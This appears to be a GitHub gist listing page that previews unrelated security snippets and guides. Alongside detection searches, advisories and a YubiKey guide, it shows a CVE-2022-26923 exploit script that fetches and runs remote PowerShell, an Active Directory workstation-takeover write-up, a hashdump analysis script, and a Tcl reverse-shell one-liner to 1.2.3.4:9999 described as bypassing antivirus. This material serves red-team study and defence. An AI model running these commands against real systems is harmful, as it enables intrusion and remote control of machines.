Skip to content

Instantly share code, notes, and snippets.

View stmyers's full-sized avatar

Steve M. stmyers

10 followers · 8 following
  • Amsterdam, NL
View GitHub Profile
@cbecks2
cbecks2 / gist:94f4bfc52e519923888027b89eca0445
Created July 3, 2023 19:53
Subsearch for detect_patterns table
This search is designed to work with Crowdstrike FDR data ingested into Splunk. I will leave the exercise to you to translate this into your own SIEM.
``` Identied PatternIds via | inputlookup detect_patterns.csv where description="mything ```
```Join AssociateIndicator events to the process and command that did them. We sub-search for our suspect aid + TargetProcessId combination and use them to look for the associated ProcessRollup2 events.```
``` Process rollup events ```
( `Your FDR Index`
event_platform="Win"
event_simpleName IN (ProcessRollup2,SyntheticProcessRollup2)
@awakecoding
awakecoding / Get-RdpLogonEvent.ps1
Created September 7, 2022 01:20
function Get-RdpLogonEvent
{
[CmdletBinding()]
param(
[Int32] $Last = 10
)
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
LogName='Security'
ProviderName='Microsoft-Windows-Security-Auditing'
@Wh04m1001
Wh04m1001 / CVE-2022–26923.ps1
Last active June 23, 2023 10:09
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@r00t-3xp10it
r00t-3xp10it / GetCounterMeasures.ps1
Last active July 20, 2024 23:05
List common security processes running!
<#
.SYNOPSIS
List common security processes running!
Author: @r00t-3xp10it (ssa redteam)
Tested Under: Windows 10 (19043) x64 bits
Required Dependencies: Get-WmiObject, Get-Process {native}
Optional Dependencies: Get-MpPreference, Get-ChildItem {native}
PS cmdlet Dev version: v2.3.18
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active March 11, 2026 09:27
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@sm-Fifteen
sm-Fifteen / whats_a_yubikey.md
Last active March 5, 2026 09:08
"What the heck is a Yubikey and why did I buy one?": A user guide

"What the heck is a Yubikey and why did I buy one?": A user guide

(EDIT: Besides Reddit, I've also put this up on Github Gist)

So while looking for information on security keys before getting one myself, I got very confused reading about all the different modes and advertised features of Yubikeys and other similar dongles. The official documentation tends to be surprisingly convoluted at times, weirdly organized and oddly shy about a few of the limitations of these keys (which I'm making a point of putting front and center). Now that I have one, I decided to write down everything I figured out in order to help myself (and hopefully some other people reading this) make sense of all this.

Since I'm partly writing these notes for myself, there might be some back and forth between "exp

@ClementNerma
ClementNerma / zsh-cheatsheet.md
Last active March 16, 2026 20:06

ZSH CheatSheet

This is a cheat sheet for how to perform various actions to ZSH, which can be tricky to find on the web as the syntax is not intuitive and it is generally not very well-documented.

Strings

Description Syntax
Get the length of a string ${#VARNAME}
Get a single character ${VARNAME[index]}
@tokyoneon
tokyoneon / reverse_shell.tcl
Created April 20, 2019 08:10
Use One Tclsh Command to Bypass Antivirus #macOS
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;
@bandrel
bandrel / check_hashes.py
Last active November 5, 2024 06:12
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")